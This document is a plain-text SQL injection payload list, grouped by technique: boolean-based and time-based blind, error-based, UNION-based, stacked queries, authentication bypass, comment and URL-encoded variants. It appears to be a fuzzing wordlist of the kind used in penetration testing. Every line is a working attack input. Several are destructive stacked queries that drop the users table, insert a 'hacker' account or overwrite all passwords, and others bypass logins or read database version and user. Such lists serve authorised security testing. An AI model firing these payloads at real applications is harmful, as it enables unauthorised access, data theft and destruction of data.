# SQL Injection Payloads
# Organized by technique type

# ===== Basic String Terminators =====
'
"
`
')
")
`)
'))
"))

# ===== Boolean-Based Blind =====
' OR '1'='1
" OR "1"="1
' OR '1'='1' --
" OR "1"="1" --
' OR '1'='1' #
" OR "1"="1" #
' OR '1'='1'/*
' OR 1=1 --
" OR 1=1 --
' OR 1=1 #
" OR 1=1 #
or 1=1
or 1=1--
or 1=1#
or 1=1/*
') OR ('1'='1
") OR ("1"="1
')) OR (('1'='1
' OR 'x'='x
' AND '1'='1
' AND 1=1 --
1' AND '1'='1
1 AND 1=1
1' AND 1=1 --

# ===== Error-Based =====
' AND 1=CONVERT(int,@@version)--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version()),0x7e),1)--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 10--

# ===== Time-Based Blind =====
' AND SLEEP(5)--
" AND SLEEP(5)--
' AND SLEEP(5)#
" AND SLEEP(5)#
'; WAITFOR DELAY '0:0:5'--
"; WAITFOR DELAY '0:0:5'--
1; WAITFOR DELAY '0:0:5'--
' AND BENCHMARK(5000000,SHA1('test'))--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND pg_sleep(5)--
'; SELECT pg_sleep(5)--

# ===== UNION-Based =====
' UNION SELECT 1--
' UNION SELECT 1,2--
' UNION SELECT 1,2,3--
' UNION ALL SELECT 1--
' UNION ALL SELECT 1,2--
' UNION SELECT NULL,@@version--
' UNION SELECT NULL,user()--
' UNION SELECT NULL,database()--

# ===== Stacked Queries =====
'; DROP TABLE users--
'; INSERT INTO users VALUES('hacker','hacked')--
'; UPDATE users SET password='hacked'--

# ===== Authentication Bypass =====
admin'--
admin'#
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
') or '1'='1--
' or 1=1#
' or 1=1/*
' or ''='
' or 'x'='x
' or 0=0 --
" or 0=0 --

# ===== Comment Injection =====
'--
'#
'/*
--
#
/*
'-- -
'--+

# ===== Encoded Payloads =====
%27
%22
%27%20OR%20%271%27%3D%271
%27%20AND%20%271%27%3D%271
